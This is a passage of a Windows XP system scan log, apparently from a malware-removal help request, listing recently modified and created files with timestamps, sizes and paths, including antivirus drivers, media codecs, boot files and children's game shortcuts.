[2010/05/08 18:29:45 | 000,056,832 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2010/05/06 20:39:44 | 000,000,801 | ---- | M] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Find And Run Robot.lnk
[2010/05/06 20:36:03 | 000,000,046 | ---- | M] () -- C:\WINDOWS\System32\DonationCoder_findrunrobot_InstallInfo.dat
[2010/05/06 20:36:03 | 000,000,046 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\DonationCoder_findrunrobot_InstallInfo.dat
[2010/05/06 20:24:03 | 000,002,626 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2010/05/06 16:59:36 | 000,165,032 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\aswBoot.exe
[2010/05/06 16:39:23 | 000,046,672 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2010/05/06 16:39:00 | 000,164,048 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2010/05/06 16:34:27 | 000,023,376 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2010/05/06 16:33:59 | 000,100,432 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2010/05/06 16:33:55 | 000,094,800 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2010/05/06 16:33:47 | 000,019,024 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2010/05/06 16:33:29 | 000,028,880 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2010/05/04 22:42:48 | 000,526,010 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI
[2010/05/04 22:42:48 | 000,444,690 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2010/05/04 22:42:48 | 000,072,456 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2010/04/29 15:39:38 | 000,038,224 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2010/04/29 15:39:26 | 000,020,952 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2010/04/26 15:58:12 | 000,256,512 | ---- | M] () -- C:\WINDOWS\PEV.exe
[2010/04/25 21:23:41 | 000,000,746 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Thomas New Line.lnk
[2010/04/25 11:50:13 | 000,230,824 | R--- | M] (Coupons, Inc.) -- C:\WINDOWS\System32\cpnprt2.cid
[2010/04/24 17:26:27 | 000,000,596 | ---- | M] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to SnortStart.lnk
[2010/04/24 17:21:41 | 000,000,419 | ---- | M] () -- C:\Documents and Settings\Me\.oinkguirc
[2010/04/24 14:14:27 | 000,003,072 | -H-- | M] () -- C:\Documents and Settings\Me\My Documents\photothumb.db
[2010/04/21 21:16:06 | 000,000,073 | ---- | M] () -- C:\WINDOWS\System32\-1
[2010/04/20 20:18:40 | 000,413,696 | ---- | M] (Creative Labs) -- C:\WINDOWS\System32\wrap_oal.dll
[2010/04/20 20:18:40 | 000,110,592 | ---- | M] (Portions (C) Creative Labs Inc. and NVIDIA Corp.) -- C:\WINDOWS\System32\OpenAL32.dll
[2010/04/15 22:28:45 | 000,000,095 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\SpongeBob SquarePants Hall Monitor & Jellyfish Jam SpongeBob Video SpongeBob.com.URL
[2010/04/14 12:47:23 | 000,038,848 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\avastSS.scr
[2010/04/13 12:07:33 | 000,419,040 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2010/04/11 21:17:19 | 000,130,792 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[2010/04/09 13:16:52 | 000,535,624 | ---- | M] () -- C:\WINDOWS\System32\pwNative.exe
[2010/04/09 13:16:50 | 000,016,472 | ---- | M] () -- C:\WINDOWS\System32\pwdrvio.sys
[2010/04/09 13:16:46 | 000,011,104 | ---- | M] () -- C:\WINDOWS\System32\pwdspio.sys
[2010/04/07 20:45:20 | 000,058,708 | ---- | M] () -- C:\Documents and Settings\Me\My Documents\0000.png
[2010/04/05 18:16:26 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\Me\jagex__preferences3.dat
[2010/04/04 08:27:58 | 008,294,454 | ---- | M] () -- C:\WINDOWS\System32\toyhide.bmp
[2010/04/03 19:22:32 | 000,066,714 | ---- | M] () -- C:\WINDOWS\System32\NvwsApps.xml
[2010/04/03 18:55:31 | 002,183,470 | ---- | M] () -- C:\WINDOWS\System32\nvdata.bin
[2010/04/03 18:55:31 | 000,061,440 | ---- | M] (Khronos Group) -- C:\WINDOWS\System32\OpenCL.dll
[2010/04/03 18:55:31 | 000,009,046 | ---- | M] () -- C:\WINDOWS\System32\nvinfo.pb
[2010/04/01 11:26:20 | 003,939,704 | ---- | M] (Sysinternals - www.sysinternals.com) -- C:\Program Files\procexp.exe
[2010/03/29 19:54:53 | 000,000,600 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\PUTTY.RND
[2010/03/26 22:01:55 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\atiapfxx.blb
[2010/03/26 22:01:37 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\atiicdxx.dat
[2010/03/23 07:57:08 | 000,358,944 | ---- | M] (Realtek Semiconductor Crop.) -- C:\WINDOWS\vncutil.exe
[2010/03/23 07:56:52 | 000,129,568 | ---- | M] (Realtek Semiconductor) -- C:\WINDOWS\RtkAudioService.exe
[2010/03/23 07:56:44 | 002,815,520 | ---- | M] (RealTek Semicoductor Corp.) -- C:\WINDOWS\ALCWZRD.EXE
[2010/03/20 09:54:51 | 000,000,306 | ---- | M] () -- C:\WINDOWS\IfoEdit.INI
[2010/03/20 09:50:19 | 000,000,107 | ---- | M] () -- C:\WINDOWS\VobEdit.INI
[2010/03/19 20:56:32 | 000,044,579 | ---- | M] () -- C:\Documents and Settings\Me\peerblock.dmp
[2010/03/17 19:33:51 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\UMDF\Msft_User_WpdMtpDr_01_00_00.Wdf
[2010/03/13 16:15:41 | 000,000,000 | ---- | M] () -- C:\WINDOWS\ativpsrm.bin
[2010/03/09 22:51:32 | 000,000,008 | ---- | M] () -- C:\WINDOWS\System32\drivers\RTKHDAUD.DAT
[2010/03/09 20:47:35 | 000,001,863 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Microsoft Digital Image Suite 2006 Library.lnk
[2010/03/09 20:47:09 | 000,001,923 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\Microsoft Digital Image Suite 2006 Editor.lnk
[2010/02/27 13:24:27 | 000,000,926 | ---- | M] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Dropbox.lnk
[2010/02/24 22:54:07 | 000,000,070 | --S- | M] () -- C:\Documents and Settings\Me\jd
[2010/02/23 00:18:52 | 000,000,762 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Disney Princess Magical Dress-Up.lnk
[2010/02/23 00:17:31 | 000,001,290 | ---- | M] () -- C:\WINDOWS\disney.ini
[2010/02/23 00:11:52 | 000,000,794 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Bob The Builder.lnk
[2010/02/23 00:09:38 | 000,000,034 | ---- | M] () -- C:\WINDOWS\Tiny_Run.ini
[2010/02/22 09:03:30 | 000,001,744 | -H-- | M] () -- C:\Documents and Settings\Me\My Documents\Default.rdp
[2010/02/21 19:37:32 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LMouFilt_01005.Wdf
[2010/02/21 19:37:32 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LHidFilt_01005.Wdf
[2010/02/21 19:37:29 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\MsftWdf_Kernel_01005_Coinstaller_Critical.Wdf
[2010/02/21 19:35:54 | 000,001,696 | ---- | M] () -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Logitech SetPoint.lnk
[2010/02/17 06:01:31 | 000,000,036 | ---- | M] () -- C:\Documents and Settings\Me\Local Settings\Application Data\housecall.guid.cache
[2010/02/16 22:44:05 | 000,000,016 | ---- | M] () -- C:\WINDOWS\System32\w3data.vss
[2010/02/16 22:44:05 | 000,000,016 | ---- | M] () -- C:\WINDOWS\msocreg32.dat
[2010/02/16 00:13:43 | 000,002,892 | ---- | M] () -- C:\WINDOWS\System32\audcon.sys
[2010/02/15 19:03:59 | 000,039,755 | ---- | M] () -- C:\boot0
[2010/02/15 16:21:18 | 000,012,540 | ---- | M] () -- C:\WINDOWS\System32\wpa.bak
[2010/02/14 01:13:11 | 000,691,696 | ---- | M] () -- C:\WINDOWS\System32\drivers\sptd.sys
[2010/02/13 23:16:27 | 000,000,731 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Blues Clues.lnk
[2010/02/13 23:15:54 | 000,000,134 | ---- | M] () -- C:\WINDOWS\BluesCluesPreschool.ini
[2010/02/13 20:59:57 | 000,000,705 | ---- | M] () -- C:\Documents and Settings\Me\Desktop\Thomas.lnk
[2010/02/13 20:59:11 | 000,000,219 | ---- | M] () -- C:\WINDOWS\PowerReg.dat
[2010/02/13 17:41:01 | 000,000,004 | ---- | M] () -- C:\WINDOWS\Pix11.dat
[2010/02/13 17:29:27 | 000,000,818 | ---- | M] () -- C:\WINDOWS\System32\unins000.dat
[2010/02/13 17:23:03 | 000,072,748 | ---- | M] (Jordan Russell) -- C:\WINDOWS\unins001.exe
[2010/02/13 17:23:03 | 000,000,801 | ---- | M] () -- C:\WINDOWS\unins001.dat
[2010/02/13 17:22:56 | 000,072,748 | ---- | M] (Jordan Russell) -- C:\WINDOWS\unins000.exe
[2010/02/13 17:22:56 | 000,000,801 | ---- | M] () -- C:\WINDOWS\unins000.dat
[2010/02/13 16:48:00 | 000,000,578 | ---- | M] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to procexp.lnk
[2010/02/13 11:28:07 | 000,023,392 | ---- | M] () -- C:\WINDOWS\System32\nscompat.tlb
[2010/02/13 11:28:07 | 000,016,832 | ---- | M] () -- C:\WINDOWS\System32\amcompat.tlb
[2010/02/13 11:27:17 | 000,000,000 | ---- | M] () -- C:\WINDOWS\System32\drivers\UMDF\MsftWdf_user_01_00_00.Wdf
[2010/02/13 10:43:56 | 000,316,640 | ---- | M] () -- C:\WINDOWS\WMSysPr9.prx
[2010/02/13 09:44:58 | 000,250,048 | RHS- | M] () -- C:\ntldr
[2010/02/12 23:18:02 | 000,000,000 | ---- | M] () -- C:\WINDOWS\nsreg.dat
[2010/02/12 23:16:43 | 000,940,794 | ---- | M] () -- C:\WINDOWS\System32\LoopyMusic.wav
[2010/02/12 23:16:43 | 000,146,650 | ---- | M] () -- C:\WINDOWS\System32\BuzzingBee.wav
[2010/02/12 22:12:01 | 000,000,010 | ---- | M] () -- C:\WINDOWS\GSetup.ini
[2010/02/12 22:07:32 | 000,008,192 | ---- | M] () -- C:\WINDOWS\REGLOCS.OLD
[2010/02/12 22:06:30 | 000,000,261 | ---- | M] () -- C:\WINDOWS\System32\$winnt$.inf
[2010/02/12 22:03:36 | 000,000,000 | RHS- | M] () -- C:\MSDOS.SYS
[2010/02/12 22:03:36 | 000,000,000 | RHS- | M] () -- C:\IO.SYS
[2010/02/12 22:03:36 | 000,000,000 | ---- | M] () -- C:\WINDOWS\control.ini
[2010/02/12 22:03:36 | 000,000,000 | ---- | M] () -- C:\CONFIG.SYS
[2010/02/12 22:03:36 | 000,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT
[2010/02/12 22:03:24 | 000,004,161 | ---- | M] () -- C:\WINDOWS\ODBCINST.INI
[2010/02/12 22:02:39 | 000,000,488 | ---- | M] () -- C:\WINDOWS\System32\WindowsLogon.manifest
[2010/02/12 22:02:39 | 000,000,488 | ---- | M] () -- C:\WINDOWS\System32\logonui.exe.manifest
[2010/02/12 22:02:35 | 000,000,749 | RH-- | M] () -- C:\WINDOWS\WindowsShell.Manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\wuaucpl.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\sapi.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\nwc.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\ncpa.cpl.manifest
[2010/02/12 22:02:35 | 000,000,749 | ---- | M] () -- C:\WINDOWS\System32\cdplayer.exe.manifest
[2010/02/12 21:59:39 | 000,021,640 | ---- | M] () -- C:\WINDOWS\System32\emptyregdb.dat
[2010/02/12 21:59:29 | 000,000,037 | ---- | M] () -- C:\WINDOWS\vbaddin.ini
[2010/02/12 21:59:29 | 000,000,036 | ---- | M] () -- C:\WINDOWS\vb.ini
[7 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[4 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[1 C:\Documents and Settings\Me\*.tmp files -> C:\Documents and Settings\Me\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2010/05/13 20:23:48 | 009,115,308 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\pidgin-2.7.0.exe
[2010/05/12 16:15:05 | 000,134,825 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-blank.pdf
[2010/05/12 16:10:02 | 000,182,179 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01(3).pdf
[2010/05/12 16:06:11 | 000,182,349 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01(2).pdf
[2010/05/12 15:45:04 | 000,079,807 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01.pdf
[2010/05/12 15:44:09 | 002,088,136 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\jody-seit-form-01.jpg
[2010/05/12 12:40:06 | 000,000,807 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\PrimoPDF - Drop Files Here to Convert!.lnk
[2010/05/12 12:40:03 | 000,176,235 | ---- | C] () -- C:\WINDOWS\System32\Primomonnt.dll
[2010/05/11 19:26:43 | 000,000,801 | ---- | C] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Find And Run Robot.lnk
[2010/05/11 18:37:03 | 000,000,244 | ---- | C] () -- C:\Boot.bak
[2010/05/11 18:36:59 | 000,260,272 | ---- | C] () -- C:\cmldr
[2010/05/11 18:35:18 | 000,256,512 | ---- | C] () -- C:\WINDOWS\PEV.exe
[2010/05/11 18:35:18 | 000,098,816 | ---- | C] () -- C:\WINDOWS\sed.exe
[2010/05/11 18:35:18 | 000,080,412 | ---- | C] () -- C:\WINDOWS\grep.exe
[2010/05/11 18:35:18 | 000,077,312 | ---- | C] () -- C:\WINDOWS\MBR.exe
[2010/05/11 18:35:18 | 000,068,096 | ---- | C] () -- C:\WINDOWS\zip.exe
[2010/05/11 15:16:09 | 000,000,008 | ---- | C] () -- C:\WINDOWS\System32\drivers\RTKHDAUD.DAT
[2010/05/11 15:08:46 | 000,071,676 | ---- | C] () -- C:\Documents and Settings\Me\My Documents\DriverAgent_scan_results
[2010/05/11 15:01:44 | 001,048,576 | ---- | C] () -- C:\bios-save.rom
[2010/05/10 07:05:28 | 000,535,624 | ---- | C] () -- C:\WINDOWS\System32\pwNative.exe
[2010/05/10 07:05:26 | 000,016,472 | ---- | C] () -- C:\WINDOWS\System32\pwdrvio.sys
[2010/05/10 07:05:25 | 000,011,104 | ---- | C] () -- C:\WINDOWS\System32\pwdspio.sys
[2010/05/06 20:36:03 | 000,000,046 | ---- | C] () -- C:\WINDOWS\System32\DonationCoder_findrunrobot_InstallInfo.dat
[2010/05/06 20:36:03 | 000,000,046 | ---- | C] () -- C:\Documents and Settings\Me\Local Settings\Application Data\DonationCoder_findrunrobot_InstallInfo.dat
[2010/04/25 21:22:54 | 000,000,746 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Thomas New Line.lnk
[2010/04/24 17:26:19 | 000,000,596 | ---- | C] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to SnortStart.lnk
[2010/04/24 17:21:41 | 000,000,419 | ---- | C] () -- C:\Documents and Settings\Me\.oinkguirc
[2010/04/24 14:24:38 | 000,003,840 | ---- | C] () -- C:\WINDOWS\System32\drivers\BANTExt.sys
[2010/04/24 14:14:04 | 000,003,072 | -H-- | C] () -- C:\Documents and Settings\Me\My Documents\photothumb.db
[2010/04/21 21:16:05 | 000,000,073 | ---- | C] () -- C:\WINDOWS\System32\-1
[2010/04/15 22:28:45 | 000,000,095 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\SpongeBob SquarePants Hall Monitor & Jellyfish Jam SpongeBob Video SpongeBob.com.URL
[2010/04/12 00:18:43 | 001,900,132 | ---- | C] () -- C:\WINDOWS\System32\ExpansionHD_Firmware.bin
[2010/04/12 00:18:43 | 000,192,512 | ---- | C] () -- C:\WINDOWS\System32\DigiPlatformSupport.dll
[2010/04/11 20:55:54 | 000,487,912 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
[2010/04/11 13:11:01 | 000,058,708 | ---- | C] () -- C:\Documents and Settings\Me\My Documents\0000.png
[2010/04/10 21:18:57 | 000,001,014 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-746137067-1078081533-839522115-1003UA.job
[2010/04/10 21:18:56 | 000,000,962 | ---- | C] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-746137067-1078081533-839522115-1003Core.job
[2010/04/08 17:52:39 | 000,038,492 | ---- | C] () -- C:\WINDOWS\System32\DLLAV32.lib
[2010/04/08 17:51:49 | 000,120,200 | ---- | C] () -- C:\WINDOWS\System32\DLLDEV32i.dll
[2010/04/05 18:16:26 | 000,000,075 | ---- | C] () -- C:\Documents and Settings\Me\jagex_runescape_preferences2.dat
[2010/04/05 18:16:26 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\Me\jagex__preferences3.dat
[2010/04/05 18:15:09 | 000,000,041 | ---- | C] () -- C:\Documents and Settings\Me\jagex_runescape_preferences.dat
[2010/04/03 19:22:32 | 000,066,714 | ---- | C] () -- C:\WINDOWS\System32\NvwsApps.xml
[2010/04/03 19:22:32 | 000,000,104 | ---- | C] () -- C:\WINDOWS\System32\NvApps.xml
[2010/03/26 22:01:55 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\atiapfxx.blb
[2010/03/26 22:01:37 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\atiicdxx.dat
[2010/03/26 21:43:52 | 002,183,470 | ---- | C] () -- C:\WINDOWS\System32\nvdata.bin
[2010/03/20 09:50:19 | 000,000,107 | ---- | C] () -- C:\WINDOWS\VobEdit.INI
[2010/03/19 23:00:32 | 008,294,454 | ---- | C] () -- C:\WINDOWS\System32\toyhide.bmp
[2010/03/19 22:06:54 | 000,001,696 | ---- | C] () -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Logitech SetPoint.lnk
[2010/03/19 22:06:54 | 000,000,926 | ---- | C] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Dropbox.lnk
[2010/03/19 22:06:54 | 000,000,578 | ---- | C] () -- C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to procexp.lnk
[2010/03/19 15:56:02 | 000,044,579 | ---- | C] () -- C:\Documents and Settings\Me\peerblock.dmp
[2010/03/17 19:33:51 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\UMDF\Msft_User_WpdMtpDr_01_00_00.Wdf
[2010/03/14 17:06:51 | 000,117,850 | ---- | C] () -- C:\WINDOWS\System32\Cnmnput.chm
[2010/03/13 16:15:41 | 000,000,000 | ---- | C] () -- C:\WINDOWS\ativpsrm.bin
[2010/03/13 16:11:33 | 000,007,167 | ---- | C] () -- C:\WINDOWS\System32\atifglpf.xml
[2010/03/13 16:11:29 | 000,294,912 | ---- | C] () -- C:\WINDOWS\System32\ATIODE.exe
[2010/03/13 16:11:29 | 000,045,056 | ---- | C] () -- C:\WINDOWS\System32\ATIODCLI.exe
[2010/03/13 16:11:28 | 000,455,520 | ---- | C] () -- C:\WINDOWS\System32\ativvaxx.cap
[2010/03/13 10:39:47 | 000,419,040 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2010/03/09 20:47:35 | 000,001,863 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Microsoft Digital Image Suite 2006 Library.lnk
[2010/03/09 20:47:09 | 000,001,923 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\Microsoft Digital Image Suite 2006 Editor.lnk
[2010/02/26 13:22:25 | 000,000,600 | ---- | C] () -- C:\Documents and Settings\Me\Local Settings\Application Data\PUTTY.RND
[2010/02/24 22:54:07 | 000,000,070 | --S- | C] () -- C:\Documents and Settings\Me\jd
[2010/02/23 00:18:27 | 000,000,762 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Disney Princess Magical Dress-Up.lnk
[2010/02/23 00:16:14 | 000,001,290 | ---- | C] () -- C:\WINDOWS\disney.ini
[2010/02/23 00:11:25 | 000,000,794 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Bob The Builder.lnk
[2010/02/22 23:57:10 | 000,354,816 | ---- | C] () -- C:\WINDOWS\System32\psisdecd.dll
[2010/02/22 23:57:10 | 000,354,816 | ---- | C] () -- C:\WINDOWS\System32\dllcache\psisdecd.dll
[2010/02/22 23:57:10 | 000,052,224 | ---- | C] () -- C:\WINDOWS\System32\msdvbnp.ax
[2010/02/22 23:57:10 | 000,052,224 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msdvbnp.ax
[2010/02/22 23:57:10 | 000,030,208 | ---- | C] () -- C:\WINDOWS\System32\psisrndr.ax
[2010/02/22 23:57:10 | 000,030,208 | ---- | C] () -- C:\WINDOWS\System32\dllcache\psisrndr.ax
[2010/02/22 23:57:09 | 001,798,144 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qedit.dll
[2010/02/22 23:57:09 | 000,733,184 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qedwipes.dll
[2010/02/22 23:57:09 | 000,470,528 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qdvd.dll
[2010/02/22 23:57:09 | 000,316,928 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qdv.dll
[2010/02/22 23:57:09 | 000,257,024 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qcap.dll
[2010/02/22 23:57:09 | 000,173,056 | ---- | C] () -- C:\WINDOWS\System32\dllcache\qasf.dll
[2010/02/22 23:57:09 | 000,136,192 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mpg2splt.ax
[2010/02/22 23:57:09 | 000,132,608 | ---- | C] () -- C:\WINDOWS\System32\dllcache\devenum.dll
[2010/02/22 23:57:09 | 000,064,512 | ---- | C] () -- C:\WINDOWS\System32\dllcache\amstream.dll
[2010/02/22 23:57:09 | 000,034,304 | ---- | C] () -- C:\WINDOWS\System32\dllcache\mciqtz32.dll
[2010/02/22 23:57:09 | 000,013,312 | ---- | C] () -- C:\WINDOWS\System32\dllcache\msdmo.dll
[2010/02/22 23:55:48 | 000,000,034 | ---- | C] () -- C:\WINDOWS\Tiny_Run.ini
[2010/02/22 09:02:48 | 000,001,744 | -H-- | C] () -- C:\Documents and Settings\Me\My Documents\Default.rdp
[2010/02/21 19:37:32 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LMouFilt_01005.Wdf
[2010/02/21 19:37:32 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\Msft_Kernel_LHidFilt_01005.Wdf
[2010/02/21 19:37:29 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\MsftWdf_Kernel_01005_Coinstaller_Critical.Wdf
[2010/02/21 18:00:29 | 000,000,306 | ---- | C] () -- C:\WINDOWS\IfoEdit.INI
[2010/02/21 17:30:10 | 000,027,648 | ---- | C] () -- C:\WINDOWS\System32\AVSredirect.dll
[2010/02/21 17:29:57 | 000,227,328 | ---- | C] () -- C:\WINDOWS\System32\ac3DX.ax
[2010/02/21 17:29:57 | 000,175,104 | ---- | C] () -- C:\WINDOWS\System32\CoreAAC.ax
[2010/02/21 17:29:57 | 000,120,832 | ---- | C] () -- C:\WINDOWS\System32\MPCDx.ax
[2010/02/21 17:29:57 | 000,107,520 | ---- | C] () -- C:\WINDOWS\System32\RLMPCDec.ax
[2010/02/21 17:29:57 | 000,097,280 | ---- | C] () -- C:\WINDOWS\System32\FLACDX.ax
[2010/02/21 17:29:57 | 000,081,920 | ---- | C] () -- C:\WINDOWS\System32\aac_parser.ax
[2010/02/21 17:29:57 | 000,070,656 | ---- | C] () -- C:\WINDOWS\System32\RLAPEDec.ax
[2010/02/21 17:29:57 | 000,051,712 | ---- | C] () -- C:\WINDOWS\System32\RLSpeexDec.ax
[2010/02/17 06:01:31 | 000,000,036 | ---- | C] () -- C:\Documents and Settings\Me\Local Settings\Application Data\housecall.guid.cache
[2010/02/16 21:38:45 | 000,000,016 | ---- | C] () -- C:\WINDOWS\System32\w3data.vss
[2010/02/16 21:38:45 | 000,000,016 | ---- | C] () -- C:\WINDOWS\msocreg32.dat
[2010/02/16 00:13:43 | 000,002,892 | ---- | C] () -- C:\WINDOWS\System32\audcon.sys
[2010/02/15 20:30:15 | 000,000,512 | ---- | C] () -- C:\chain0
[2010/02/15 19:07:46 | 000,000,315 | RHS- | C] () -- C:\boot.ini
[2010/02/15 19:06:29 | 000,039,755 | ---- | C] () -- C:\boot0
[2010/02/14 01:13:11 | 000,691,696 | ---- | C] () -- C:\WINDOWS\System32\drivers\sptd.sys
[2010/02/13 23:18:42 | 002,359,350 | ---- | C] () -- C:\WINDOWS\Me.bmp
[2010/02/13 23:18:19 | 000,000,487 | ---- | C] () -- C:\Documents and Settings\Me\My Documents\Winstep.lnk
[2010/02/13 23:15:52 | 000,000,134 | ---- | C] () -- C:\WINDOWS\BluesCluesPreschool.ini
[2010/02/13 23:15:50 | 000,000,080 | ---- | C] () -- C:\WINDOWS\System32\vssver.scc
[2010/02/13 21:02:05 | 000,000,731 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Blues Clues.lnk
[2010/02/13 20:59:06 | 000,000,219 | ---- | C] () -- C:\WINDOWS\PowerReg.dat
[2010/02/13 20:56:56 | 000,000,705 | ---- | C] () -- C:\Documents and Settings\Me\Desktop\Thomas.lnk
[2010/02/13 20:54:44 | 000,160,217 | ---- | C] () -- C:\WINDOWS\System32\PowerToysLicense.rtf
[2010/02/13 17:52:56 | 000,056,832 | ---- | C] () -- C:\Documents and Settings\Me\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2010/02/13 17:41:01 | 000,000,004 | ---- | C] () -- C:\WINDOWS\Pix11.dat
[2010/02/13 17:29:27 | 000,000,818 | ---- | C] () -- C:\WINDOWS\System32\unins000.dat
[2010/02/13 17:23:03 | 000,000,801 | ---- | C] () -- C:\WINDOWS\unins001.dat
[2010/02/13 17:22:55 | 000,000,801 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2010/02/13 11:27:17 | 000,000,000 | ---- | C] () -- C:\WINDOWS\System32\drivers\UMDF\MsftWdf_user_01_00_00.Wdf
[2010/02/13 09:47:37 | 000,010,457 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmptour.hta
[2010/02/13 09:47:37 | 000,001,771 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmptour.css
[2010/02/13 09:47:37 | 000,000,855 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpocm.inf
[2010/02/13 09:47:37 | 000,000,420 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmploc.js
[2010/02/13 09:47:36 | 000,613,334 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmplayer.chm
[2010/02/13 09:47:36 | 000,572,557 | ---- | C] () -- C:\WINDOWS\System32\dllcache\rtuner.wmv
[2010/02/13 09:47:36 | 000,354,468 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud1.wav
[2010/02/13 09:47:36 | 000,343,204 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud7.wav
[2010/02/13 09:47:36 | 000,343,204 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud6.wav
[2010/02/13 09:47:36 | 000,300,969 | ---- | C] () -- C:\WINDOWS\System32\dllcache\viz.wmv
[2010/02/13 09:47:36 | 000,172,196 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud9.wav
[2010/02/13 09:47:36 | 000,172,196 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud8.wav
[2010/02/13 09:47:36 | 000,172,196 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud3.wav
[2010/02/13 09:47:36 | 000,086,196 | ---- | C] () -- C:\WINDOWS\System32\dllcache\wmpaud5.wav
